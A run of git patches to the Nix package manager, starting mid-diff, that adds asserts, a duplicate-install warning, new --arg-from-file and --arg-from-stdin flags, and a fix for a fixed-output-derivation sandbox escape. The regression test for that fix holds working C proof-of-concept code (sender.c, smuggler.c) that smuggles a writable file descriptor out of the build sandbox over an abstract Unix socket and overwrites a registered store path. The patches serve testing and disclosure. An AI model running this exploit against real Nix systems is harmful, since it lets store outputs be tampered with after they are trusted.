@@ -2480,6 +2480,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
                         CanonPath { tmpDir + "/tmp" }).hash;
                 }
                 }
+                assert(false);
             }();
 
             ValidPathInfo newInfo0 {
diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc
index e1337f51d..917813342 100644
--- a/src/libstore/daemon.cc
+++ b/src/libstore/daemon.cc
@@ -415,6 +415,8 @@ static void performOp(TunnelLogger * logger, ref store,
                     // Use NAR; Git is not a serialization method
                     dumpMethod = FileSerialisationMethod::Recursive;
                     break;
+                default:
+                    assert(false);
                 }
                 // TODO these two steps are essentially RemoteStore::addCAToStore. Move it up to Store.
                 auto path = store->addToStoreFromDump(source, name, dumpMethod, contentAddressMethod, hashAlgo, refs, repair);
diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc
index 8dfe8adda..09196481b 100644
--- a/src/libstore/remote-store.cc
+++ b/src/libstore/remote-store.cc
@@ -527,6 +527,8 @@ StorePath RemoteStore::addToStoreFromDump(
         // Use NAR; Git is not a serialization method
         fsm = FileSerialisationMethod::Recursive;
         break;
+    default:
+        assert(false);
     }
     if (fsm != dumpMethod)
         unsupported("RemoteStore::addToStoreFromDump doesn't support this `dumpMethod` `hashMethod` combination");
diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc
index 471bda6a0..570247b9e 100644
--- a/src/libutil/file-content-address.cc
+++ b/src/libutil/file-content-address.cc
@@ -123,7 +123,7 @@ Hash hashPath(
     case FileIngestionMethod::Git:
         return git::dumpHash(ht, accessor, path, filter).hash;
     }
-
+    assert(false);
 }
 
 }

From 14adff17113dd2d4c0eb6c540a74308019829866 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Mon, 26 Feb 2024 21:09:17 +0100
Subject: [PATCH 539/654] profile install: skip and warn on installing package
 twice

---
 src/nix/profile.cc              | 21 ++++++++++++++++++++-
 tests/functional/nix-profile.sh |  3 +++
 2 files changed, 23 insertions(+), 1 deletion(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index e04ae008d..d39a24d36 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -395,7 +395,26 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
 
             element.updateStorePaths(getEvalStore(), store, res);
 
-            manifest.addElement(std::move(element));
+            auto elementName = getNameFromElement(element);
+
+            // Check if the element already exists.
+            auto existingPair = manifest.elements.find(elementName);
+            if (existingPair != manifest.elements.end()) {
+                auto existingElement = existingPair->second;
+                auto existingSource = existingElement.source;
+                auto elementSource = element.source;
+                if (existingSource
+                    && elementSource
+                    && existingElement.priority == element.priority
+                    && existingSource->originalRef == elementSource->originalRef
+                    && existingSource->attrPath == elementSource->attrPath
+                    ) {
+                    warn("'%s' is already installed", elementName);
+                    continue;
+                }
+            }
+
+            manifest.addElement(elementName, std::move(element));
         }
 
         try {
diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index 88b713d53..ee93251e9 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -64,6 +64,9 @@ nix profile install $flake1Dir
 [[ $($TEST_HOME/.local/state/nix/profile/bin/hello) = "Hello World" ]]
 unset NIX_CONFIG
 
+# Test conflicting package install.
+nix profile install $flake1Dir 2>&1 | grep "warning: 'flake1' is already installed"
+
 # Test upgrading a package.
 printf NixOS > $flake1Dir/who
 printf 2.0 > $flake1Dir/version

From a55c6a0f4749084a5d85bb90a2de2b08349b6f37 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Mon, 12 Feb 2024 21:28:20 +0100
Subject: [PATCH 540/654] Add a NixOS test for the sandbox escape

Test that we can't leverage abstract unix domain sockets to leak file
descriptors out of the sandbox and modify the path after it has been
registered.
---
 tests/nixos/ca-fd-leak/default.nix | 90 ++++++++++++++++++++++++++++++
 tests/nixos/ca-fd-leak/sender.c    | 65 +++++++++++++++++++++
 tests/nixos/ca-fd-leak/smuggler.c  | 66 ++++++++++++++++++++++
 tests/nixos/default.nix            |  4 +-
 4 files changed, 224 insertions(+), 1 deletion(-)
 create mode 100644 tests/nixos/ca-fd-leak/default.nix
 create mode 100644 tests/nixos/ca-fd-leak/sender.c
 create mode 100644 tests/nixos/ca-fd-leak/smuggler.c

diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
new file mode 100644
index 000000000..40e57ea02
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/default.nix
@@ -0,0 +1,90 @@
+# Nix is a sandboxed build system. But Not everything can be handled inside its
+# sandbox: Network access is normally blocked off, but to download sources, a
+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations".
+# The detail here is not important, but in our case it means that the hash of
+# the output has to be known beforehand. And if you know that, you get a few
+# rights: you no longer run inside a special network namespace!
+#
+# Now, Linux has a special feature, that not many other unices do: Abstract
+# unix domain sockets! Not only that, but those are namespaced using the
+# network namespace! That means that we have a way to create sockets that are
+# available in every single fixed-output derivation, and also all processes
+# running on the host machine! Now, this wouldn't be that much of an issue, as,
+# well, the whole idea is that the output is pure, and all processes in the
+# sandbox are killed before finalizing the output. What if we didn't need those
+# processes at all? Unix domain sockets have a semi-known trick: you can pass
+# file descriptors around!
+# This makes it possible to exfiltrate a file-descriptor with write access to
+# $out outside of the sandbox. And that file-descriptor can be used to modify
+# the contents of the store path after it has been registered.
+
+{ config, ... }:
+
+let
+  pkgs = config.nodes.machine.nixpkgs.pkgs;
+
+  # Simple C program that sends a a file descriptor to `$out` to a Unix
+  # domain socket.
+  # Compiled statically so that we can easily send it to the VM and use it
+  # inside the build sandbox.
+  sender = pkgs.runCommandWith {
+    name = "sender";
+    stdenv = pkgs.pkgsStatic.stdenv;
+  } ''
+    $CC -static -o $out ${./sender.c}
+  '';
+
+  # Okay, so we have a file descriptor shipped out of the FOD now. But the
+  # Nix store is read-only, right? .. Well, yeah. But this file descriptor
+  # lives in a mount namespace where it is not! So even when this file exists
+  # in the actual Nix store, we're capable of just modifying its contents...
+  smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c);
+
+  # The abstract socket path used to exfiltrate the file descriptor
+  socketName = "FODSandboxExfiltrationSocket";
+in
+{
+  name = "ca-fd-leak";
+
+  nodes.machine =
+    { config, lib, pkgs, ... }:
+    { virtualisation.writableStore = true;
+      nix.settings.substituters = lib.mkForce [ ];
+      virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ];
+    };
+
+  testScript = { nodes }: ''
+    start_all()
+
+    machine.succeed("echo hello")
+    # Start the smuggler server
+    machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &")
+
+    # Build the smuggled derivation.
+    # This will connect to the smuggler server and send it the file descriptor
+    machine.succeed(r"""
+      nix-build -E '
+        builtins.derivation {
+          name = "smuggled";
+          system = builtins.currentSystem;
+          # look ma, no tricks!
+          outputHashMode = "flat";
+          outputHashAlgo = "sha256";
+          outputHash = builtins.hashString "sha256" "hello, world\n";
+          builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
+          args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ];
+      }'
+    """.strip())
+
+
+    # Tell the smuggler server that we're done
+    machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
+
+    # Check that the file was modified
+    machine.succeed(r"""
+      cat ./result
+      test "$(cat ./result)" = "hello, world"
+    """.strip())
+  '';
+
+}
diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c
new file mode 100644
index 000000000..75e54fc8f
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/sender.c
@@ -0,0 +1,65 @@
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+int main(int argc, char **argv) {
+
+    assert(argc == 2);
+
+    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+    // Set up a abstract domain socket path to connect to.
+    struct sockaddr_un data;
+    data.sun_family = AF_UNIX;
+    data.sun_path[0] = 0;
+    strcpy(data.sun_path + 1, argv[1]);
+
+    // Now try to connect, To ensure we work no matter what order we are
+    // executed in, just busyloop here.
+    int res = -1;
+    while (res < 0) {
+        res = connect(sock, (const struct sockaddr *)&data,
+            offsetof(struct sockaddr_un, sun_path)
+              + strlen(argv[1])
+              + 1);
+        if (res < 0 && errno != ECONNREFUSED) perror("connect");
+        if (errno != ECONNREFUSED) break;
+    }
+
+    // Write our message header.
+    struct msghdr msg = {0};
+    msg.msg_control = malloc(128);
+    msg.msg_controllen = 128;
+
+    // Write an SCM_RIGHTS message containing the output path.
+    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+    hdr->cmsg_len = CMSG_LEN(sizeof(int));
+    hdr->cmsg_level = SOL_SOCKET;
+    hdr->cmsg_type = SCM_RIGHTS;
+    int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640);
+    memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
+
+    msg.msg_controllen = CMSG_SPACE(sizeof(int));
+
+    // Write a single null byte too.
+    msg.msg_iov = malloc(sizeof(struct iovec));
+    msg.msg_iov[0].iov_base = "";
+    msg.msg_iov[0].iov_len = 1;
+    msg.msg_iovlen = 1;
+
+    // Send it to the othher side of this connection.
+    res = sendmsg(sock, &msg, 0);
+    if (res < 0) perror("sendmsg");
+    int buf;
+
+    // Wait for the server to close the socket, implying that it has
+    // received the commmand.
+    recv(sock, (void *)&buf, sizeof(int), 0);
+}
diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c
new file mode 100644
index 000000000..82acf37e6
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/smuggler.c
@@ -0,0 +1,66 @@
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+int main(int argc, char **argv) {
+
+    assert(argc == 2);
+
+    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+    // Bind to the socket.
+    struct sockaddr_un data;
+    data.sun_family = AF_UNIX;
+    data.sun_path[0] = 0;
+    strcpy(data.sun_path + 1, argv[1]);
+    int res = bind(sock, (const struct sockaddr *)&data,
+        offsetof(struct sockaddr_un, sun_path)
+        + strlen(argv[1])
+        + 1);
+    if (res < 0) perror("bind");
+
+    res = listen(sock, 1);
+    if (res < 0) perror("listen");
+
+    int smuggling_fd = -1;
+
+    // Accept the connection a first time to receive the file descriptor.
+    fprintf(stderr, "%s\n", "Waiting for the first connection");
+    int a = accept(sock, 0, 0);
+    if (a < 0) perror("accept");
+
+    struct msghdr msg = {0};
+    msg.msg_control = malloc(128);
+    msg.msg_controllen = 128;
+
+    // Receive the file descriptor as sent by the smuggler.
+    recvmsg(a, &msg, 0);
+
+    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+    while (hdr) {
+        if (hdr->cmsg_level == SOL_SOCKET
+          && hdr->cmsg_type == SCM_RIGHTS) {
+
+            // Grab the copy of the file descriptor.
+            memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int));
+        }
+
+        hdr = CMSG_NXTHDR(&msg, hdr);
+    }
+    fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection");
+    close(a);
+
+    // Wait for a second connection, which will tell us that the build is
+    // done
+    a = accept(sock, 0, 0);
+    fprintf(stderr, "%s\n", "Got a second connection, rewriting the file");
+    // Write a new content to the file
+    if (ftruncate(smuggling_fd, 0)) perror("ftruncate");
+    char * new_content = "Pwned\n";
+    int written_bytes = write(smuggling_fd, new_content, strlen(new_content));
+    if (written_bytes != strlen(new_content)) perror("write");
+}
diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix
index 8f4fa2621..98de31e13 100644
--- a/tests/nixos/default.nix
+++ b/tests/nixos/default.nix
@@ -109,7 +109,7 @@ in
       nix.package = lib.mkForce pkgs.nixVersions.nix_2_13;
     };
   };
-  
+
   # TODO: (nixpkgs update) remoteBuildsSshNg_remote_2_18 = ...
 
   # Test our Nix as a builder for clients that are older
@@ -156,4 +156,6 @@ in
     (system: runNixOSTestFor system ./setuid.nix);
 
   fetch-git = runNixOSTestFor "x86_64-linux" ./fetch-git;
+
+  ca-fd-leak = runNixOSTestFor "x86_64-linux" ./ca-fd-leak;
 }

From c3878f510ec12ca6bf24505989e7463249dab61a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Tue, 13 Feb 2024 08:28:02 +0100
Subject: [PATCH 541/654] Copy the output of fixed-output derivations before
 registering them

It is possible to exfiltrate a file descriptor out of the build sandbox
of FODs, and use it to modify the store path after it has been
registered.
To avoid that issue, don't register the output of the build, but a copy
of it (that will be free of any leaked file descriptor).
---
 src/libstore/build/local-derivation-goal.cc | 6 ++++++
 src/libutil/file-system.cc                  | 5 +++++
 src/libutil/file-system.hh                  | 7 +++++++
 3 files changed, 18 insertions(+)

diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index a9b8de123..d2e2f523e 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -2543,6 +2543,12 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
             [&](const DerivationOutput::CAFixed & dof) {
                 auto & wanted = dof.ca.hash;
 
+                // Replace the output by a fresh copy of itself to make sure
+                // that there's no stale file descriptor pointing to it
+                Path tmpOutput = actualPath + ".tmp";
+                renameFile(actualPath, tmpOutput);
+                copyFile(tmpOutput, actualPath, true);
+
                 auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating {
                     .method = dof.ca.method,
                     .hashAlgo = wanted.algo,
diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
index b0a3f0797..9dd6a5133 100644
--- a/src/libutil/file-system.cc
+++ b/src/libutil/file-system.cc
@@ -617,6 +617,11 @@ void copy(const fs::directory_entry & from, const fs::path & to, bool andDelete)
     }
 }
 
+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete)
+{
+    return copy(fs::directory_entry(fs::path(oldPath)), fs::path(newPath), andDelete);
+}
+
 void renameFile(const Path & oldName, const Path & newName)
 {
     fs::rename(oldName, newName);
diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh
index 464efc242..963265e34 100644
--- a/src/libutil/file-system.hh
+++ b/src/libutil/file-system.hh
@@ -186,6 +186,13 @@ void renameFile(const Path & src, const Path & dst);
  */
 void moveFile(const Path & src, const Path & dst);
 
+/**
+ * Recursively copy the content of `oldPath` to `newPath`. If `andDelete` is
+ * `true`, then also remove `oldPath` (making this equivalent to `moveFile`, but
+ * with the guaranty that the destination will be “fresh”, with no stale inode
+ * or file descriptor pointing to it).
+ */
+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete);
 
 /**
  * Automatic cleanup of resources.

From 65b79c52c66643a04bd9eb69b92d7e5c5587ca64 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <7226587+thufschmitt@users.noreply.github.com>
Date: Wed, 21 Feb 2024 17:32:36 +0100
Subject: [PATCH 542/654] Fix a typo in a test comment

Co-authored-by: Valentin Gagarin 
---
 tests/nixos/ca-fd-leak/default.nix | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
index 40e57ea02..a6ae72adc 100644
--- a/tests/nixos/ca-fd-leak/default.nix
+++ b/tests/nixos/ca-fd-leak/default.nix
@@ -80,7 +80,7 @@ in
     # Tell the smuggler server that we're done
     machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
 
-    # Check that the file was modified
+    # Check that the file was not modified
     machine.succeed(r"""
       cat ./result
       test "$(cat ./result)" = "hello, world"

From cd9baa18093cf863a852334721ea972bcd0c5902 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Fri, 1 Mar 2024 09:31:05 +0100
Subject: [PATCH 543/654] Add release notes

---
 doc/manual/rl-next/fod-sandbox-escape.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 doc/manual/rl-next/fod-sandbox-escape.md

diff --git a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md
new file mode 100644
index 000000000..ed451711e
--- /dev/null
+++ b/doc/manual/rl-next/fod-sandbox-escape.md
@@ -0,0 +1,14 @@
+---
+synopsis: Fix a FOD sandbox escape
+issues:
+prs:
+---
+
+Cooperating Nix derivations could send file descriptors to files in the Nix
+store to each other via Unix domain sockets in the abstract namespace. This
+allowed one derivation to modify the output of the other derivation, after Nix
+has registered the path as "valid" and immutable in the Nix database.
+In particular, this allowed the output of fixed-output derivations to be
+modified from their expected content.
+
+This isn't the case any more.

From d72ee91d07a286b18862235792326297199a0d75 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Fri, 1 Mar 2024 14:14:14 +0100
Subject: [PATCH 544/654] Clean up --arg processing

---
 src/libcmd/common-eval-args.cc | 20 ++++++++++++--------
 src/libcmd/common-eval-args.hh |  7 ++++++-
 2 files changed, 18 insertions(+), 9 deletions(-)

diff --git a/src/libcmd/common-eval-args.cc b/src/libcmd/common-eval-args.cc
index 444ff81c9..ed2c126a4 100644
--- a/src/libcmd/common-eval-args.cc
+++ b/src/libcmd/common-eval-args.cc
@@ -20,7 +20,7 @@ MixEvalArgs::MixEvalArgs()
         .description = "Pass the value *expr* as the argument *name* to Nix functions.",
         .category = category,
         .labels = {"name", "expr"},
-        .handler = {[&](std::string name, std::string expr) { autoArgs[name] = 'E' + expr; }}
+        .handler = {[&](std::string name, std::string expr) { autoArgs.insert_or_assign(name, AutoArg{AutoArgExpr(expr)}); }}
     });
 
     addFlag({
@@ -28,7 +28,7 @@ MixEvalArgs::MixEvalArgs()
         .description = "Pass the string *string* as the argument *name* to Nix functions.",
         .category = category,
         .labels = {"name", "string"},
-        .handler = {[&](std::string name, std::string s) { autoArgs[name] = 'S' + s; }},
+        .handler = {[&](std::string name, std::string s) { autoArgs.insert_or_assign(name, AutoArg{AutoArgString(s)}); }},
     });
 
     addFlag({
@@ -154,13 +154,17 @@ MixEvalArgs::MixEvalArgs()
 Bindings * MixEvalArgs::getAutoArgs(EvalState & state)
 {
     auto res = state.buildBindings(autoArgs.size());
-    for (auto & i : autoArgs) {
+    for (auto & [name, arg] : autoArgs) {
         auto v = state.allocValue();
-        if (i.second[0] == 'E')
-            state.mkThunk_(*v, state.parseExprFromString(i.second.substr(1), state.rootPath(".")));
-        else
-            v->mkString(((std::string_view) i.second).substr(1));
-        res.insert(state.symbols.create(i.first), v);
+        std::visit(overloaded {
+            [&](const AutoArgExpr & arg) {
+                state.mkThunk_(*v, state.parseExprFromString(arg.expr, state.rootPath(".")));
+            },
+            [&](const AutoArgString & arg) {
+                v->mkString(arg.s);
+            }
+        }, arg);
+        res.insert(state.symbols.create(name), v);
     }
     return res.finish();
 }
diff --git a/src/libcmd/common-eval-args.hh b/src/libcmd/common-eval-args.hh
index 2eb63e15d..2e2f18385 100644
--- a/src/libcmd/common-eval-args.hh
+++ b/src/libcmd/common-eval-args.hh
@@ -26,7 +26,12 @@ struct MixEvalArgs : virtual Args, virtual MixRepair
     std::optional evalStoreUrl;
 
 private:
-    std::map autoArgs;
+    struct AutoArgExpr { std::string expr; };
+    struct AutoArgString { std::string s; };
+
+    using AutoArg = std::variant;
+
+    std::map autoArgs;
 };
 
 SourcePath lookupFileArg(EvalState & state, std::string_view s, const Path * baseDir = nullptr);

From 291b10c607e3f9d19acee692ac2488056e53eeee Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Fri, 1 Mar 2024 14:35:27 +0100
Subject: [PATCH 545/654] Add --arg-from-file for reading a string from a file

---
 src/libcmd/common-eval-args.cc | 12 ++++++++++++
 src/libcmd/common-eval-args.hh |  3 ++-
 tests/functional/eval.sh       |  8 ++++++++
 3 files changed, 22 insertions(+), 1 deletion(-)

diff --git a/src/libcmd/common-eval-args.cc b/src/libcmd/common-eval-args.cc
index ed2c126a4..89df67406 100644
--- a/src/libcmd/common-eval-args.cc
+++ b/src/libcmd/common-eval-args.cc
@@ -31,6 +31,15 @@ MixEvalArgs::MixEvalArgs()
         .handler = {[&](std::string name, std::string s) { autoArgs.insert_or_assign(name, AutoArg{AutoArgString(s)}); }},
     });
 
+    addFlag({
+        .longName = "arg-from-file",
+        .description = "Pass the contents of file *path* as the argument *name* to Nix functions.",
+        .category = category,
+        .labels = {"name", "path"},
+        .handler = {[&](std::string name, std::string path) { autoArgs.insert_or_assign(name, AutoArg{AutoArgFile(path)}); }},
+        .completer = completePath
+    });
+
     addFlag({
         .longName = "include",
         .shortName = 'I',
@@ -162,6 +171,9 @@ Bindings * MixEvalArgs::getAutoArgs(EvalState & state)
             },
             [&](const AutoArgString & arg) {
                 v->mkString(arg.s);
+            },
+            [&](const AutoArgFile & arg) {
+                v->mkString(readFile(arg.path));
             }
         }, arg);
         res.insert(state.symbols.create(name), v);
diff --git a/src/libcmd/common-eval-args.hh b/src/libcmd/common-eval-args.hh
index 2e2f18385..9f4da4231 100644
--- a/src/libcmd/common-eval-args.hh
+++ b/src/libcmd/common-eval-args.hh
@@ -28,8 +28,9 @@ struct MixEvalArgs : virtual Args, virtual MixRepair
 private:
     struct AutoArgExpr { std::string expr; };
     struct AutoArgString { std::string s; };
+    struct AutoArgFile { std::filesystem::path path; };
 
-    using AutoArg = std::variant;
+    using AutoArg = std::variant;
 
     std::map autoArgs;
 };
diff --git a/tests/functional/eval.sh b/tests/functional/eval.sh
index b81bb1e2c..321593670 100644
--- a/tests/functional/eval.sh
+++ b/tests/functional/eval.sh
@@ -41,3 +41,11 @@ mkdir -p $TEST_ROOT/xyzzy $TEST_ROOT/foo
 ln -sfn ../xyzzy $TEST_ROOT/foo/bar
 printf 123 > $TEST_ROOT/xyzzy/default.nix
 [[ $(nix eval --impure --expr "import $TEST_ROOT/foo/bar") = 123 ]]
+
+# Test --arg-from-file.
+[[ "$(nix eval --raw --arg-from-file foo config.nix --expr '{ foo }: { inherit foo; }' foo)" = "$(cat config.nix)" ]]
+
+# Check that special(-ish) files are drained.
+if [[ -e /proc/version ]]; then
+    [[ "$(nix eval --raw --arg-from-file foo /proc/version --expr '{ foo }: { inherit foo; }' foo)" = "$(cat /proc/version)" ]]
+fi

From 8ce1f6800b9eef394d2cb9dffdf99e7a6ffec64a Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Fri, 1 Mar 2024 14:39:42 +0100
Subject: [PATCH 546/654] Add --arg-from-stdin to read an argument from stdin

---
 src/libcmd/common-eval-args.cc | 11 +++++++++++
 src/libcmd/common-eval-args.hh |  3 ++-
 tests/functional/eval.sh       |  3 +++
 3 files changed, 16 insertions(+), 1 deletion(-)

diff --git a/src/libcmd/common-eval-args.cc b/src/libcmd/common-eval-args.cc
index 89df67406..b87bbbc27 100644
--- a/src/libcmd/common-eval-args.cc
+++ b/src/libcmd/common-eval-args.cc
@@ -40,6 +40,14 @@ MixEvalArgs::MixEvalArgs()
         .completer = completePath
     });
 
+    addFlag({
+        .longName = "arg-from-stdin",
+        .description = "Pass the contents of stdin as the argument *name* to Nix functions.",
+        .category = category,
+        .labels = {"name"},
+        .handler = {[&](std::string name) { autoArgs.insert_or_assign(name, AutoArg{AutoArgStdin{}}); }},
+    });
+
     addFlag({
         .longName = "include",
         .shortName = 'I',
@@ -174,6 +182,9 @@ Bindings * MixEvalArgs::getAutoArgs(EvalState & state)
             },
             [&](const AutoArgFile & arg) {
                 v->mkString(readFile(arg.path));
+            },
+            [&](const AutoArgStdin & arg) {
+                v->mkString(readFile(STDIN_FILENO));
             }
         }, arg);
         res.insert(state.symbols.create(name), v);
diff --git a/src/libcmd/common-eval-args.hh b/src/libcmd/common-eval-args.hh
index 9f4da4231..7548bd3b7 100644
--- a/src/libcmd/common-eval-args.hh
+++ b/src/libcmd/common-eval-args.hh
@@ -29,8 +29,9 @@ private:
     struct AutoArgExpr { std::string expr; };
     struct AutoArgString { std::string s; };
     struct AutoArgFile { std::filesystem::path path; };
+    struct AutoArgStdin { };
 
-    using AutoArg = std::variant;
+    using AutoArg = std::variant;
 
     std::map autoArgs;
 };
diff --git a/tests/functional/eval.sh b/tests/functional/eval.sh
index 321593670..c6a475cd0 100644
--- a/tests/functional/eval.sh
+++ b/tests/functional/eval.sh
@@ -49,3 +49,6 @@ printf 123 > $TEST_ROOT/xyzzy/default.nix
 if [[ -e /proc/version ]]; then
     [[ "$(nix eval --raw --arg-from-file foo /proc/version --expr '{ foo }: { inherit foo; }' foo)" = "$(cat /proc/version)" ]]
 fi
+
+# Test --arg-from-stdin.
+[[ "$(echo bla | nix eval --raw --arg-from-stdin foo --expr '{ foo }: { inherit foo; }' foo)" = bla ]]

From 1bc89b588b04b31d14398da015c0aa6693942a67 Mon Sep 17 00:00:00 2001
From: med8bra 
Date: Thu, 29 Feb 2024 13:27:48 +0100
Subject: [PATCH 547/654] doc(xp-feature): add issue url in experimental
 feature details

---
 src/libutil/experimental-features.cc | 30 +++++++++++++++++++++++++---
 1 file changed, 27 insertions(+), 3 deletions(-)

diff --git a/src/libutil/experimental-features.cc b/src/libutil/experimental-features.cc
index 9b46fc5b0..374e674af 100644
--- a/src/libutil/experimental-features.cc
+++ b/src/libutil/experimental-features.cc
@@ -1,4 +1,5 @@
 #include "experimental-features.hh"
+#include "fmt.hh"
 #include "util.hh"
 
 #include "nlohmann/json.hpp"
@@ -10,6 +11,7 @@ struct ExperimentalFeatureDetails
     ExperimentalFeature tag;
     std::string_view name;
     std::string_view description;
+    std::string_view trackingUrl;
 };
 
 /**
@@ -35,6 +37,7 @@ constexpr std::array xpFeatureDetails
             [__contentAddressed](@docroot@/language/advanced-attributes.md#adv-attr-__contentAddressed)
             for details.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/35",
     },
     {
         .tag = Xp::ImpureDerivations,
@@ -65,6 +68,7 @@ constexpr std::array xpFeatureDetails
 
             This is a more explicit alternative to using [`builtins.currentTime`](@docroot@/language/builtin-constants.md#builtins-currentTime).
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/42",
     },
     {
         .tag = Xp::Flakes,
@@ -73,6 +77,7 @@ constexpr std::array xpFeatureDetails
             Enable flakes. See the manual entry for [`nix
             flake`](@docroot@/command-ref/new-cli/nix3-flake.md) for details.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/27",
     },
     {
         .tag = Xp::FetchTree,
@@ -86,6 +91,7 @@ constexpr std::array xpFeatureDetails
 
             Enabling just this feature serves as a "release candidate", allowing users to try it out in isolation.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/31",
     },
     {
         .tag = Xp::NixCommand,
@@ -94,6 +100,7 @@ constexpr std::array xpFeatureDetails
             Enable the new `nix` subcommands. See the manual on
             [`nix`](@docroot@/command-ref/new-cli/nix.md) for details.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/28",
     },
     {
         .tag = Xp::GitHashing,
@@ -102,6 +109,7 @@ constexpr std::array xpFeatureDetails
             Allow creating (content-addressed) store objects which are hashed via Git's hashing algorithm.
             These store objects will not be understandable by older versions of Nix.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/41",
     },
     {
         .tag = Xp::RecursiveNix,
@@ -143,6 +151,7 @@ constexpr std::array xpFeatureDetails
             already in the build inputs or built by a previous recursive Nix
             call.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/47",
     },
     {
         .tag = Xp::NoUrlLiterals,
@@ -184,6 +193,7 @@ constexpr std::array xpFeatureDetails
             containing parameters have to be quoted anyway, and unquoted URLs
             may confuse external tooling.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/44",
     },
     {
         .tag = Xp::FetchClosure,
@@ -191,6 +201,7 @@ constexpr std::array xpFeatureDetails
         .description = R"(
             Enable the use of the [`fetchClosure`](@docroot@/language/builtins.md#builtins-fetchClosure) built-in function in the Nix language.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/40",
     },
     {
         .tag = Xp::ReplFlake,
@@ -200,6 +211,7 @@ constexpr std::array xpFeatureDetails
 
             Allow passing [installables](@docroot@/command-ref/new-cli/nix.md#installables) to `nix repl`, making its interface consistent with the other experimental commands.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/32",
     },
     {
         .tag = Xp::AutoAllocateUids,
@@ -208,6 +220,7 @@ constexpr std::array xpFeatureDetails
             Allows Nix to automatically pick UIDs for builds, rather than creating
             `nixbld*` user accounts. See the [`auto-allocate-uids`](@docroot@/command-ref/conf-file.md#conf-auto-allocate-uids) setting for details.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/34",
     },
     {
         .tag = Xp::Cgroups,
@@ -216,6 +229,7 @@ constexpr std::array xpFeatureDetails
             Allows Nix to execute builds inside cgroups. See
             the [`use-cgroups`](@docroot@/command-ref/conf-file.md#conf-use-cgroups) setting for details.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/36",
     },
     {
         .tag = Xp::DaemonTrustOverride,
@@ -226,6 +240,7 @@ constexpr std::array xpFeatureDetails
             useful for various experiments with `nix-daemon --stdio`
             networking.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/38",
     },
     {
         .tag = Xp::DynamicDerivations,
@@ -239,6 +254,7 @@ constexpr std::array xpFeatureDetails
